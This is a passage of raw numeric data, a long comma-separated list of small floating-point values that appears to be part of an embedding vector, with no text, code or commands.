.015325572,0.020180007,-0.021447614,0.03356057,-0.012009377,0.016450088,0.031096756,-0.010314699,-0.0013816349,-0.008724251,-0.022920894,0.004817747,-0.0016781555,0.022857446,-0.026888458,0.010222375,-0.0024336658,0.0134713985,0.002175576,-0.0019362452,0.029378224,-0.011335091,-0.013628627,0.030830309,0.014575664,-0.018955108,-0.017198546,0.0019390418,0.0033075868,-0.013337592,0.0117872935,-0.0010115051,0.006755662,0.03260391,-0.0056507066,-0.011814106,0.021635093,-0.0080832485,0.0033690399,0.03073691,0.020114694,-0.026787454,-0.0027529395,0.027256994,-0.04120471,-0.0061329515,-0.009136952,-0.0023020988,0.004897274,-0.022188751,0.008497666,-0.013006125,-0.010052354,0.0015538939,-0.00066064973,-0.009149838,-0.01230026,0.034333143,-0.011436768,0.0006473256,0.016605223,0.013614033,0.0043121916,0.00920276,-0.016081253,-0.0102873705,0.006442616,-0.020998886,-0.0077121076,0.018513685,0.00202437,0.0005316639,0.0036840849,-0.018771123,0.020528082,0.021431265,-0.010397592,0.0068277502,-0.035877224,-0.025428342,-0.0030873206,-0.024614867,-0.031485133,-0.005847698,0.01654854,0.017454024,-0.018427443,-0.0023615866,-0.031832825,-0.043518376,0.014200499,-0.028474987,-0.014022715,-0.0008024037,0.011438722,0.014576404,0.008452887,0.05445561,-0.0071592256,0.012203158,0.013293559,0.014363852,0.009008952,0.0020367822,-0.030923665,-0.01937538,0.0171593,0.027725363,0.0034899255,0.0024063962,-0.0014734971,0.011428376,0.008441915,0.031825174,-0.007787057,-0.017007707,-0.015876073,-0.034211207,0.01023862,0.015287793,0.017755404,0.006656567,0.0028390314,-0.009847929,-0.011116578,0.014988969,0.0074231825,-0.016631514,0.019043857,-0.013598155,0.009470884,-0.0017812792,0.016962394,-0.013252134,-0.025328757,0.010962398,-0.004054053,-0.0043443046,-0.004111645,0.020110471,-0.0015234741,-0.0030190605,0.015855549,-0.019731658,0.03505923,0.009377468,0.012764729,0.023722924,-0.0012991163,-0.0014878055,0.003586852,0.013206749,0.025790622,-0.026988063,-0.002166408,-0.013115899,0.03483019,-0.011875727,-0.01216564,-0.015777143,-0.019875906,-0.021154515,0.0064780577,-0.012204709,0.011657031,-0.0036297375,-0.011654403,-0.011222734,-0.0024715771,0.0042161844,0.025119573,-0.030351827,-0.0045226724,-0.045037758,-0.022792092,0.0014291634,0.007774684,0.0020713042,-0.020249639,-0.010673319,-0.0089973705,-0.0108541325,0.016858155,-0.011026606,0.034141373,-0.0026471186,0.0025563468,0.0065440554,-0.007842563,0.028993458,-0.0145236505,-0.0004626542,0.044905838,0.0001680457,0.0006419584,-0.0036024915,0.00013246089,0.029378043,0.02019037,-0.010333868,0.0019520209,-0.0031803316,0.023584682,0.012443344,-0.0021783472,-0.0067880913,0.01167693,0.03183429,0.0331294,-0.0059561585,-0.005250612,0.03282981,-0.0042900504,0.017362945,0.007464153,0.019950466,-0.008467809,-0.01305605,-0.0063380953,-0.0039191605,0.010406751,0.0035847514,-0.006608634,0.0001747384,0.012409543,-0.008662239,-0.038882695,-0.008544383,0.00973079,-0.01518786,0.003582276,-0.013132763,0.001012073,0.0028152883,-0.03259426,-0.016556032,0.0005480612,-0.0069329124,0.011336241,-0.008922576,0.008021761,0.011509537,0.007475884,-0.004589602,-0.0008092389,-0.0023049538,-0.011872775,0.00016501913,0.015748184,0.000071916336,-0.011994069,-0.010475891,0.010968876,-0.026966322,0.027674645,-0.0017572562,-0.0045395303,-0.0078584645,-0.0043378947,-0.0013812005,0.004205077,-0.015714452,0.04695203,-0.0059188446,-0.033725955,0.010499377,0.0042082192,0.0060068024,0.009098975,-0.015416818,0.033211786,0.010998241,-0.012720663,0.0051148674,0.00043567005,-0.0032796925,-0.011108773,0.01044198,-0.022027798,-0.011252403,0.0014961591,0.006381511,0.009132737,-0.012702908,0.04429136,-0.022755792,0.025509823,0.008310518,-0.020690039,-0.0054483847,0.009442114,0.026062686,0.0036804809,-0.032133453,0.003979217,0.02064477,-0.0517632,-0.0058554537,0.0097233895,0.011872421,-0.0151865585,0.018481962,-0.0069672274,-0.021251913,-0.012694027,-0.020971885,0.014106163,0.02682789,-0.006062359,0.018995205,0.034475196,0.02227821,0.001835072,-0.0073759556,-0.027883785,0.016715236,0.015315234,-0.009120113,0.0018125011,0.042560562,0.01275671,0.019585246,0.013206433,-0.02836165,-0.01525408,-0.012908151,-0.0017165425,-0.01863778,-0.008500668,-0.0074553937,0.011237828,0.02197769,-0.0102932025,-0.0062793964,0.036541604,-0.009025323,0.006764107,-0.012918957,0.016567137,-0.0032823852,0.021610675,0.014929555,0.038103756,-0.0075663948,-0.014464957,-0.019929342,-0.015725251,0.0013309434,-0.006643521,-0.00979273,-0.007029806,-0.012356838,0.005570912,0.0019168514,0.011537903,-0.008535639,0.015922196,0.023651576,-0.00563359,0.022221692,0.0034675293,-0.005269026,0.014943709,0.012733345,-0.004165954,-0.021917092,0.0017156353,0.02015841,0.014674896,-0.005005043,0.001298987,0.0053278,-0.03132973,0.013260722,0.025879633,0.033367537,-0.01974784,0.025228396,-0.004682165,-0.014627146,-0.020054298,0.018800423,0.008065533,0.0033083856,0.010415224,-0.016530817,0.013878716,0.0017758392,-0.0011780123,0.054821454,-0.003659007,0.015303837,0.012989232,0.007816457,-0.0166977,0.016215285,0.012395573,0.008413014,-0.017720146,-0.023288162,-0.03340699,-0.011623544,-0.032624904,-0.002460781,-0.030793604,0.0035624357,0.0121800825,0.0015583022,0.017504705,0.0076173125,0.0061295615,0.02188553,0.02615857,0.01625109,0.028479436,0.0149479145,-0.019568413,0.004167575,-0.0058865673,0.011509609,-0.014600666,-0.009606163,0.00024056942,-0.007872948,-0.0018219614,0.016322078,-0.013423014,-0.0077952673,0.018825404,0.0066959574,-0.014327497,0.03294866,0.0010011499,0.0052499333,-0.005889508,-0.022898544,-0.02278726,-0.002936133,-0.006546501,0.0056755836,0.016270174,-0.005727352,0.00010774033,-0.013734311,0.016803388,0.016173266,0.020664558,0.01738484,-0.015802909,-0.006909712,0.004941276,0.007366509,-0.0047413986,-0.012858984,0.009535026,-0.0031059708,-0.011404509,0.013480798,-0.019234395,0.009350048,-0.0069404044,0.001343688,0.016785065,-0.011410654,0.015556231,0.0004628923,-0.009792808,-0.017735342,-0.018598093,0.0040427106,-0.02175471,0.0414394,0.022045024,-0.024855614,0.015538224,0.0016105147,-0.013287411,0.06832235,0.016763175,0.019535,0.00082593184,-0.008015738,0.008186914,0.0054189414,0.012989912,-0.004048154,0.0063705267,-0.01721079,0.0071788994,0.0061244466,0.012016279,0.0175733,-0.013106089,-0.00097539317,-0.004347168,-0.012932231,-0.012371124,0.005207326,0.032396093,0.02710989,-0.0050043194,0.0043485714,0.0055629844,0.021392696,-0.0043106824,0.008331686,-0.0031583526,-0.010417104,0.015947854,0.015930552,0.0036917082,-0.008335347,-0.036954407,0.009365509,0.0843963,-0.013902779,-0.0014450402,0.016152797,-0.018681485,0.0119776605,-0.09209699,0.012176735,-0.00043989532,-0.0051061227,0.0038359896,-0.011299947,-0.011107174,0.03008737,0.015211343,-0.003836072,-0.0029234758,-0.026147325,0.030602455,-0.014001402,-0.009745393,0.007943339,-0.0074185836,-0.003750834,-0.036665443,-0.006669941,-0.0028182126,-0.0052112206,0.0033562835,-0.02374024,0.009687145,-0.010377076,0.013747131,-0.007190286,-0.014355568,0.0190214,0.010462809,0.007712731,-0.007094225,-0.020469744,0.014385742,0.012676535,-0.016493317,-0.042405624,-0.10357186,0.00043055377,0.010406233,-0.04652684,0.013191913,-0.026240261,0.013794368,-0.0128790215,0.015349619,0.0017101064,-0.012966904,0.024404272,0.006256607,-0.0014515113,-0.025385816,0.010415496,-0.0039843055,0.004765607,0.00571414,-0.0083427,0.026198328,-0.00038810584,-0.02482425,-0.013811434,-0.032514572,0.011293709,-0.011643148,0.03421682,0.022245632,0.0011039007,-0.00045633732,0.013273036,-0.023589825,0.0011680968,-0.008528053,-0.0075795967,-0.009842397,0.009092781,-0.01599068,0.0188605,0.0004374503,-0.0041135494,-0.0057328558,-0.004397551,0.0027222885,0.008599742,-0.0030613889,0.013810298,0.028633697,-0.0055225464,0.015623017,0.000695356,-0.019524518,0.017886518,0.0028098961,-0.0052014855,-0.016766852,-0.014612069,-0.021831576,0.003958016,-0.0061121937,-0.013632387,-0.005584342,-0.0110986745,0.04269884,0.007825552,0.0049727573,-0.016226256,-0.00869096,-0.009471771,0.002780777,0.016241712,-0.00654032,-0.023022486,0.021340296,0.0065793856,0.005069375,0.0072649345,0.018842973,-0.018097926,0.009276124,-0.01626834,0.008760387,-0.037988257,0.0164806,-0.01718465,0.005110302,-0.0053873328,-0.013260713,-0.010411766,0.032538783,-0.010266693,0.016992385,-0.009662773,0.009323353,0.011885181,0.042354465,-0.012383414,-0.0075380043,0.009743825,0.011866232,-0.003830554,-0.028293397,-0.010116946,-0.00949622,0.0006681228,0.0029405602,-0.016206412,-0.021183,0.00416974,-0.004679312,0.0014435896,0.016922636,-0.004196209,-0.01998767,-0.032759327,0.007094727,-0.0077792155,0.0117479395,-0.00078192767,-0.025192663,0.016625918,-0.0039182287,0.016868653,0.048068438,0.012730449,-0.016547516,-0.0012927552,-0.011275198,0.01343032,-0.037660792,0.0106604025,-0.0029511491,0.014954383,0.0018653576,0.0019527415,-0.012416842,0.012844281,-0.03171163,-0.014384298,-0.01240005,0.009505199,-0.017903777,-0.0013259075,0.020978227,-0.013475374,0.034567315,-0.0016613386,0.0059123416,-0.003913809,-0.0003233088,0.019858578,-0.04232437,-0.03725512,0.029716892,0.048455186,-0.004834942,-0.012860562,0.02299877,0.016284162,0.012820432,0.01623225,-0.019273221,-0.0032843936,-0.032384835,-0.011918704,-0.024688212,-0.01657541,0.005972264,-0.03163902,0.009890398,0.0067537674,0.0139468545,0.0057830834,0.0035474154,0.008980307,-0.026589287,-0.0141910445,0.021871328,0.002679702,-0.0024336672,0.03570907,-0.004547993,-0.0025951539,-0.0035043336,0.0027930583,-0.013308017,-0.00449453,-0.0011239392,0.0028654928,-0.040440556,-0.012608767,0.007553471,0.0052935425,-0.028273934,-0.002829299,0.022145826,0.016195502,-0.030678168,0.0065653897,-0.0354378,-0.023372347,-0.012883452,0.0018526922,-0.014314118,-0.0025402335,0.009949339,-0.007869149,-0.018137097,0.005678989,-0.002766492,-0.014853824,-0.008598415,0.0026936238,-0.007931069,0.008076709,-0.02878433,-0.015742507,-0.0014422443,-0.02124735,0.012954566,-0.00094838097,-0.004342577,-0.00002512025,0.011053221,-0.005472501,-0.006401647,-0.033706293,-0.009704435,-0.00229339,-0.011668355,-0.0140420925,-0.012788218,-0.009626144,0.03747262,0.0071257553,0.023372315,0.003882469,-0.0078462055,-0.009758227,-0.028163793,-0.0012385689,0.054207634,-0.021891795,0.0015274022,0.021804312,0.009143576,0.013244064,-0.0032208106,0.020340545,0.02069392,0.015041209,0.000512848,0.022988586,0.0053119524,0.018645797,0.010034176,0.011437332,-0.0049459706,-0.0017686933,-0.0017187013,0.01080395,0.014891594,0.02642174,-0.013916957,0.01074765,-0.017477445,0.008238856,-0.025755286,-0.018376622,0.0672103,0.002413214,0.024421716,0.025057916,-0.001305727,-0.027412405,0.019413276,0.0010806455,-0.008680114,0.030782484,-0.026588993,0.028998906,0.0123598715,-0.024957802,0.018857323,0.0010587608,0.018941266,0.011186193,-0.01305696,0.006572432,-0.009032284,0.017535724,0.018895146,0.002663807,0.017953288,-0.023257595,-0.019320382,0.0015057761,0.00045348055,-0.025865762,0.0067854626,-0.0074853534,0.006996673,-0.025745448,0.009393594,-0.011345602,0.011979282,-0.012921246,-0.0085009765,0.012951123,0.021596117,-0.021086687,-0.008825032,-0.018178644,0.006019689,-0.0061884117,0.037215874,0.0054511065,0.01664246,-0.021304345,0.039466854,0.031480793,-0.0088531375,0.024871223,-0.0002715291,-0.00527279,-0.017987732,-0.005314072,-0.0056374944,0.0034929144,-0.026403988,-0.005791578,0.0153789595,-0.014041481,-0.008111711,0.01420928,0.0040941136,0.0048031546,-0.004622237,-0.005382736,0.021590587,0.005508733,0.02873483,-0.008337269,0.017857173,-0.010542082,0.019292386,-0.009262247,-0.0030499208,-0.026600562,-0.0023365,0.012624134,-0.0120612215,0.015905466,-0.0029565825,0.008642601,0.015026812,-0.023106866,-0.022258645,-0.00075702224,-0.017592512,-0.020152127,-0.03116174,-0.0042469692,-0.012410843,-0.019356303,0.0025765155,-0.0004659429,0.01320625,-0.016326154,-0.021448007,0.0007347249,0.02171028,0.012011351,-0.027487593,-0.001440897,-0.00048213132,0.01703292,0.014875285,0.00011688986,-0.0064327335,-0.0419072,0.06459133,-0.015028345,-0.0057963044,-0.007282362,0.018760832,0.013426422,-0.010316476,-0.0064555216,-0.012667646,-0.013634637,-0.011719464,-0.032702338,0.00739294,0.0023127173,-0.027764628,-0.021356953,0.005094072,-0.020568516,-0.016353697,-0.014414665,0.003139916,-0.012658555,0.027416104,0.0068437573,-0.01407627,-0.054118022,-0.019590925,0.020174371,-0.007498131,0.008958195,0.010954687,-0.0016196392,-0.017851477,0.0011629333,-0.03745689,-0.0008888479,-0.009644589,-0.020483712,-0.0055403276,0.0033012314,0.02622919,-0.0038314376,-0.0051319674,0.0106898155,-0.007921517,-0.010919193,-0.0012860079,-0.017645976,0.00444741,0.009701227,-0.00826476,0.01482665,0.03117036,0.014942012,-0.01745204,0.013852182,0.008331895,-0.017211828,0.004066266,0.0003816286,0.016122438,-0.014367672,-0.04511996,-0.014908809,0.011404587,0.013038416,-0.005192982,-0.022291234,0.0017506237,-0.0044008372,-0.012832333,0.018268581,0.0020580317,0.0209168,0.014541034,0.0034528798,0.005349369,-0.013175246,-0.0103318775,0.019461473,-0.0001386349,0.0106004635,-0.009628606,-0.0050421404,0.0057346565,0.018082213,0.0015838362,0.017472932,0.0064509,0.02138247,0.062621936,0.005775805,0.022244021,0.0051626125,0.0019043431,0.0014831914,-0.0012311335,-0.04297072,0.015716713,-0.027612997,-0.02092231,0.000051080253,-0.015268455,0.003090203,-0.013085543,0.00065798685,-0.02355222,0.01328261,0.009185295,-0.010665659,-0.025962356,-0.018863635,0.012643879,0.02652019,-0.0009625433,-0.03242694,-0.00747987,0.020126307,-0.0012946016,-0.0026224158,-0.018838944,0.009693501,-0.026052875,-0.008250779,-0.014628227,0.025470803,0.02271853,-0.02252125,0.016056195,0.0019017943,0.00009283449,-0.0012187815,0.0076630614,0.01945901,-0.007944046,0.007288146,-0.014686562,-0.0024353121,0.011161311,0.020535747,0.007863227,0.010350175,-0.006790111,0.0101347035,0.012654188,-0.0035957992,0.008035142,0.004263006,0.00980823,-0.009667046,0.019617315,0.007634281,0.0022701125,0.021945063,0.01912197,0.033188295,-0.0044469577,-0.017010296,0.014140533,-0.0032492564,-0.008640865,-0.017073905,0.0053285006,0.013875404,-0.0040451074,-0.0065856003,-0.027347166,0.0020095913,0.006496301,0.008761732,0.0003660769,0.026023539,0.00037605877,-0.0024412978,-0.045314558,-0.012974666,-0.0053325375,0.02754298,-0.0065210424,0.008615475,-0.00040902218,0.015284623,-0.004579914,0.0028898783,-0.022647848,0.004565649,-0.028135294,-0.015468574,0.0027788538,0.04380734,0.005818712,-0.027393162,0.0021731497,0.015233112,-0.016228888,0.0053740526,0.0031097198,0.010677306,-0.0023313293,-0.007488224,-0.008581093,0.016136054,0.010467518,0.0015415099,-0.0035929894,0.0024862539,-0.010738696,0.0132423295,-0.0055752196,-0.015381351,-0.09676595,-0.029444953,0.02786665,-0.012583259,-0.002206747,-0.016186206,0.018328864,0.0003568155,0.051021148,0.026993757,-0.020257322,0.009405077,-0.013177566,-0.0039751907,0.0032765972,-0.004124028,-0.023208376,0.0077361967,0.0002284113,-0.0069053243,-0.009291811,-0.028800838,0.007192531,0.01697606,0.0049344175,0.018134875,0.015043504,0.025733542,0.031463157,-0.0072022867,-0.006108785,0.0049955645,-0.017304745,0.013342918,0.0032856027,0.0003436395,-0.006426005,-0.017381905,0.00066086673,0.020715538,0.0014397315,0.0014309632,0.006104003,0.014602385,-0.011351797,-0.020586822,-0.0048978096,0.013372368,0.0025464168,-0.016035339,0.009970762,0.004659125,0.022391776,-0.0067910496,-0.010831268,-0.019515853,-0.00069559756,0.029303193,0.030432906,0.005981093,-0.008571449,0.021922827,-0.019679306,0.005494424,-0.0038187061,0.019231457,-0.016170524,0.0046564857,-0.005700748,0.0052180756,0.01710456,0.019739017,-0.00171552,-0.00035358497,0.026553541,0.014232357,0.016393749,0.018801734,0.01592204,-0.006159078,0.018710706,-0.037113026,0.012626544,0.021510214,-0.03761752,0.0031500675,-0.0033248619,-0.0017497201,-0.0035351529,-0.014945408,0.002876388,0.0021550432,-0.009248531,0.020811029,0.012079835,0.00590362,0.055864256,-0.0052914745,-0.010963342,-0.02961643,-0.004682508,0.021552987,-0.013987104,0.016715024,-0.031289402,0.02479528,0.02508169,-0.011026031,0.019551367,-0.002637706,-0.002489493,0.045841187,-0.026511496,0.0028184962,0.025718233,-0.0037629874,-0.013617359,-0.010947747,0.0031629363,-0.0019665055,0.0047095725,0.023080515,0.0052111275,-0.014231509,-0.0013623983,-0.020129869,-0.029482616,0.02622919,0.009450734,-0.024874287,0.010293897,0.011784107,0.011870278,-0.011047408,-0.005503767,0.011234404,-0.017582504,-0.00034814238,0.0055823773,0.0068495534,0.008290194,-0.0017782762,0.009576622,-0.008350506,-0.0019486498,0.009287341,-0.011592472,-0.002062023,-0.02020396,0.008065441,-0.015647087,-0.005588508,0.022779495,0.024261154,-0.006127904,0.013067074,-0.018182447,0.0116822645,-0.013856299,0.01798802,-0.002351543,0.034251645,0.028454978,0.009605868,-0.011217525,-0.010353523,0.0054747607,-0.00328571,0.0066118557,0.0075676157,-0.0053332597,-0.002639296,0.0133813955,-0.05084665,0.019574057,0.024432128,0.01710438,0.017602222,0.042194847,0.027966704,-0.00983829,0.015756918,-0.00786183,-0.007915686,0.0075273537,0.015760766,-0.0014128789,0.009471901,-0.00561799,0.0026597057,0.028286377,0.008433917,-0.014623453,-0.020197053,0.010174837,-0.01400716,-0.0031119452,0.03395659,0.01418351,0.0033195287,-0.017084692,0.013651677,0.007203456,-0.01475877,0.0014396716,-0.009001195,-0.0012323988,0.019550374,0.003681268,-0.015211778,-0.011182894,0.008667304,-0.017859988,0.0047362703,0.004777718,0.015472623,0.004988451,-0.012049425,-0.00280031,0.015839677,-0.015900472,-0.028289555,0.011363183,-0.0016688064,-0.0058873133,0.018730253,0.017814346,0.009414544,-0.03035294,-0.0068580355,-0.0017138903,0.0041823997,-0.022543339,-0.0026484956,-0.0076017873,0.016571924,0.013587122,0.0042929216,0.004362811,0.021481667,0.027488701,0.026072169,0.027797153,0.032211535,0.030559119,-0.0014407393,-0.007841761,-0.015127989,0.02352405,0.019247478,-0.003925703,-0.010197579,-0.0000953117,-0.00031481762,-0.009181572,0.008070587,0.015168729,0.002920185,0.008491602,0.015622206,-0.012944614,-0.00856096,-0.0041136052,-0.005874902,0.01774631,-0.014483146,-0.00831062,-0.03042368,0.0041340417,-0.0014072862,0.024060542,0.004833386,-0.0046915812,0.028784115,-0.0136694955,-0.0043498077,0.0012726971,0.011561997,0.004421966,-0.004338144,-0.009966387,-0.004892025,-0.0068426793,0.030749049,-0.010713765,0.0039340765,0.008173179,0.009325007,-0.022483593,-0.01073436,0.014404537,-0.021682793,0.008319433,0.0002812913,0.0082362015,0.0043368777,0.026358074,0.00413448,-0.0008485312,0.011818373,0.0066056047,-0.021246506,-0.0009706163,-0.003047751,0.01122703,0.011920721,0.0034174102,0.01797189,0.0011051738,-0.007733777,-0.027024234,0.027707787,-0.020027736,0.023075854,0.013512448,-0.0081377085,-0.0009576014,0.0015316703,-0.028813519,-0.011748488,-0.0025244034,-0.015800279,0.013580499,0.0034446095,0.004119573,0.0016502768,0.008155144,0.031207152,-0.03142235,-0.021437975,0.01442667,-0.016024657,-0.017210323,-0.008365056,0.026685033,0.0033147654,0.026291285,0.03515807,-0.02039401,0.017698908,0.0026214656,0.0060602757,-0.00084001693,-0.009958175,0.004112668,0.0081854835,0.01039832,0.0080343615,0.01090528,0.009496955,-0.01036947,-0.0017010611,0.0037744213,-0.012482964,0.0037107603,0.014347006,-0.016097784,-0.016200384,0.02099089,-0.0030843653,-0.0040720464,0.00256445,-0.023906123,-0.005832664,0.007949271,-0.00074259285,-0.012196353,0.010528341,-0.028781496,-0.006430317,-0.0071462225,0.024888877,-0.022765398,-0.02945198,-0.003368814,-0.08098922,-0.00803091,0.01174366,0.012466869,0.03538505,0.001421578,-0.014864304,-0.006339463,-0.010386993,0.0068169213,0.0039822743,-0.0034244831,-0.034657847,-0.0027989694,0.048125,-0.019142011,0.0032504033,0.013225624,-0.00044972962,-0.039326027,0.0073519084,0.008970113,-0.012394543,0.0031136845,0.032035712,-0.02104818,-0.0077018724,-0.0014490102,0.003078358,0.0016618166,-0.033368345,-0.0070393397,0.014578637,-0.0045279143,-0.0016831474,-0.015867857,0.020487722,0.024843087,-0.031602107,-0.062316444,-0.006980023,0.013782155,-0.008722326,0.013190113,-0.026311534,0.0012278167,-0.023381969,-0.010526517,0.0069424314,-0.00033526373,0.0020204934,-0.0005608461,-0.00508845,0.016785549,-0.003045669,0.0059608975,0.001879497,-0.012823954,0.025614852,-0.0006040514,-0.020732535,0.0039840573,0.004981046,-0.005585363,-0.008014391,0.0074839015,0.013242636,0.012848168,0.006824641,-0.0041935,0.010675716,-0.026422575,-0.010837362,-0.014521595,-0.0060831257,0.01592225,0.021222677,0.0037258742,-0.007065929,0.011012835,0.009056947,-0.0048824963,0.018284414,-0.0020672989,0.014846434,0.008874841,-0.01030185,0.015912449,0.037497558,-0.001663391,-0.021025177,-0.0095030535,0.037869062,-0.003853746,0.011242402,-0.013009353,-0.0006342976,0.01469216,-0.0123645635,0.005114066,-0.018270198,-0.005667362,-0.0052125123,-0.023379013,-0.015161031,-0.013797702,-0.0029951835,0.0061938222,-0.008435363,-0.005236248,-0.019248057,0.037255462,0.015133712,0.040429708,0.021462038,0.0064857653,-0.0016128166,0.02076129,-0.0016397684,-0.019959968,0.0043704794,-0.004983881,-0.027157594,0.028151752,0.023690863,0.0065376936,0.004854288,-0.0064949426,-0.0066477824,0.02496622,-0.0011820141,0.025198635,0.015764039,0.010212579,-0.022857152,0.011912351,0.010771672,0.02757118,0.010067641,0.017063143,0.0049261753,-0.028379692,-0.0033290284,0.004332224,-0.03390577,0.024689093,0.00036519842,0.0032962789,0.013919693,-0.022209115,0.003738584,0.015220308,-0.006730817,0.00366581,0.006019352,0.006548661,0.00889685,-0.0054767113,-0.014025839,-0.0047122333,-0.0035727192,-0.008365699,0.0077718343,-0.008435347,-0.043942038,0.00052459893,0.0018895714,-0.0005341883,-0.0087358,-0.011361243,-0.019567067,-0.021516908,-0.005938521,-0.0018775185,-0.01987345,0.009176307,0.03253794,0.023110976,-0.007701705,-0.014888017,-0.029720873,0.009750328,-0.013043318,-0.035603732,-0.008254312,-0.0064874887,-0.0076764454,-0.01498754,0.021630414,-0.0047373967,-0.001761568,0.0003047867,-0.0068819174,-0.031115308,-0.012681558,-0.010415124,0.0009295291,-0.023289423,0.0040343315,0.014344365,0.003364896,0.027065117,-0.013972213,0.026028128,0.016745785,0.011889847,-0.0065080854,0.018630965,0.004053083,0.0041976017,-0.008679308,0.009075472,0.018261816,0.09407406,-0.005881732,-0.0004366338,-0.0097138425,0.008424401,-0.0010756232,0.034836177,-0.020833569,-0.000529569,0.0055131153,0.022577515,-0.0031976027,0.019985683,-0.008002993,0.0020284397,0.019672455,0.015160234,-0.027362488,0.015838917,0.0059219883,-0.0055895443,-0.014444979,-0.01299876,-0.032224666,-0.007238376,-0.06409411,0.037838995,0.026685504,-0.004926353,0.016353052,0.0021778925,-0.0024111178,0.004890638,0.023604205,-0.019011678,0.01710057,0.0060722367,-0.009630901,-0.010633931,-0.00821465,0.016927285,0.0006472779,-0.0020066136,-0.006695549,-0.011220951,-0.019554473,-0.008208146,-0.0053809634,0.008682303,0.010939913,0.0037891802,-0.0115756625,0.012599041,-0.009284131,0.0034731796,-0.01812222,-0.009645032,0.00336691,0.008969518,-0.014113048,0.017705314,0.006123816,0.011968062,0.0011355695,0.014814633,0.01788446,-0.017116386,-0.0021231698,0.0007741339,0.0017112918,0.017582133,-0.020137422,0.003764458,-0.025645085,0.0039565964,-0.001114452,-0.008558844,-0.005219086,0.0020304553,0.01919481,0.0061003524,-0.010022016,0.0032222646,-0.006206625,0.013120807,-0.0026957358,-0.0054033683,0.016801165,0.0015654037,-0.00754441,-0.0063320333,0.014461313,0.011148307,0.016892778,-0.0054576257,-0.0020164358,0.01555523,-0.009072646,-0.02050751,0.012913016,-0.015965695,-0.0029826763,0.0013520876,0.008565587,-0.0019886382,0.0027317468,-0.008419181,0.012084687,0.008077927,0.01502931,-0.0022975476,0.005068956,-0.0003703695,0.01948159,-0.0023776016,0.028939413,-0.023796564,-0.0019523096,0.024836168,-0.02687936,-0.008079702,0.013954684,-0.004640858,0.04051465,0.006006272,-0.012139574,-0.011486764,-0.0039368677,-0.0062179468,0.0041379323,0.00066586223,-0.015220586,-0.0099081,0.032890223,0.0036691863,0.012676343,0.03150458,-0.012361916,0.0103876265,-0.007297981,0.008093074,-0.020919869,-0.017301653,-0.004541013,0.0013648819,-0.029354552,0.024046196,0.002572955,0.020676846,-0.031848125,0.0029658468,0.03530369,-0.012682626,-0.010402397,0.00086348294,-0.010848831,0.011063368,0.01231945,-0.0063968427,-0.004095214,0.012912881,-0.015608563,0.00030993766,-0.062491596,0.008002526,0.02600849,0.0065801935,-0.008274698,-0.007278761,0.0036660647,-0.031868875,0.0052730967,0.000407446,0.0009518934,-0.017569685,0.007502742,0.008768376,0.0183562,-0.00035154357,0.0010569635,0.01754182,0.0054557044,-0.0044974196,-0.012890881,0.024849134,-0.0135392025,0.0068673994,-0.0033371004,-0.02550648,0.024897667,-0.006481473,-0.01680522,-0.0030488619,0.002898877,-0.00699097,0.00048574997,-0.021384003,0.04917042,-0.0139804445,-0.042718984,-0.014024156,0.017228452,0.025740445,-0.019660937,-0.0015808961,0.0001991909,-0.007714597,-0.016454652,0.002935385,0.012345485,0.0009683416,-0.0016711965,-0.011859668,-0.02850904,-0.008058431,-0.01685318,-0.007669778,-0.017668677,-0.0032309857,-0.0130555425,0.0053050686,0.016744735,0.007428062,-0.0007077502,-0.011223871,0.020068513,-0.0020191304,0.018336765,0.020471431,-0.027616108,-0.041461345,0.0086323125,0.01334286,-0.010425447,-0.019664563,0.007292438,0.0028637522,0.0229162,-0.00055925455,0.017669952,-0.024220062,0.011625315,0.02595161,-0.014391887,-0.023324534,-0.0020117695,-0.013268426,-0.0117321415,0.007241167,0.0022227678,-0.0341518,0.0055495882,-0.004935317,-0.023131272,-0.012698719,-0.017181003,-0.004137448,0.00975678,0.008982261,-0.024858085,0.005535906,0.03095638,-0.0026735128,0.0049659098,-0.009656282,-0.0135433,0.011143638,-0.026241539,-0.023425726,0.013052828,-0.013142986,0.0051905564,-0.005447069,0.039849404,0.018764002,0.008443354,-0.0011426462,-0.0030022045,-0.010590198,-0.00013146915,0.014356139,-0.0129246805,-0.012060676,-0.0067177406,-0.016953653,-0.0059358226,-0.007471038,0.016956875,0.045027606,-0.053890966,-0.0005210416,0.011074469,0.028728595,-0.035434783,0.012644084,-0.0023475096,-0.026457222,-0.020824328,0.017399577,0.005253093,-0.021090874,-0.03321459,0.008578453,0.0148366,-0.005301213,-0.005856129,0.0074241576,-0.019144164,-0.019347154,0.0014092266,0.0040968237,0.0025683008,-0.0051180953,-0.012675415,-0.00765703,-0.021632638,0.018523123,0.0034724101,-0.0027464896,0.006569619,0.02448234,-0.01976698,-0.008290191,0.01454251,-0.005089406,0.024976283,0.017553052,-0.023567611,-0.019749146,-0.011166982,0.0011780933,0.0109074,-0.013427585,0.004765222,-0.026902242,0.009446016,-0.0050550564,0.11613405,-0.021512609,0.0031037265,0.020694561,0.008724421,0.005686691,0.019764228,0.020332603,0.018295731,0.0019288987,0.0068173455,-0.004933981,0.0034125168,0.036436822,-0.00943729,-0.011023143,0.0067130206,0.11940468,-0.02013787,0.028522829,-0.01146506,0.007737274,0.0098316455,0.018925719,0.013437173,-0.06999573,-0.006319183,-0.040407985,-0.016655266,0.017656691,-0.041647043,0.008279577,-0.0027611176,0.002101038,-0.008136094,-0.00079245394,0.017400479,-0.0042427406,-0.047772154,-0.0068893475,0.025108492,-0.014304206,-0.010637835,-0.0039681713,-0.025955267,-0.005040326,-0.026665613,-0.014156628,0.00439286,0.012477942,0.00856442,-0.020724172,0.03117911,0.0076604206,0.017413273,0.013370791,0.019012112,0.013834884,-0.021648653,0.007269303,-0.0050176973,0.016052319,-0.010406831,0.023588233,-0.0071568983,-0.0126973735,-0.010767112,-0.0056617935,0.007535187,0.024065642,0.02553477,0.0073907003,-0.004966855,-0.02890474,0.05177918,0.0044999667,-0.003079954,0.0033695465,0.021827515,0.0055602365,0.02805103,0.009548236,-0.013224192,0.00680386,0.006318169,0.0003500862,0.0020116125,0.02155101,0.029272536,-0.011272319,0.0013000515,-0.0021377043,-0.017437382,-0.00096823275,0.022401301,0.02184654,0.0037555168,-0.0025130487,0.022416089,-0.020934494,0.013080273,0.034791082,-0.005443106,-0.020830054,-0.011273156,0.01357135,-0.004361272,-0.037577715,-0.0093007805,0.017173955,0.013814636,0.0064850226,-0.011957467,0.0038967389,-0.0035025435,-0.0047909366,-0.010570955,-0.024654828,-0.030920377,-0.00070052734,0.0056856303,-0.0026502863,-0.0035116838,0.022191243,-0.02667747,-0.0006122237,0.011542829,0.016544186,-0.0031641095,-0.0018849972,-0.026409244,-0.011075715,-0.0020192484,0.06810831,0.0012581722,-0.008185003,0.014734473,-0.038875528,-0.0146610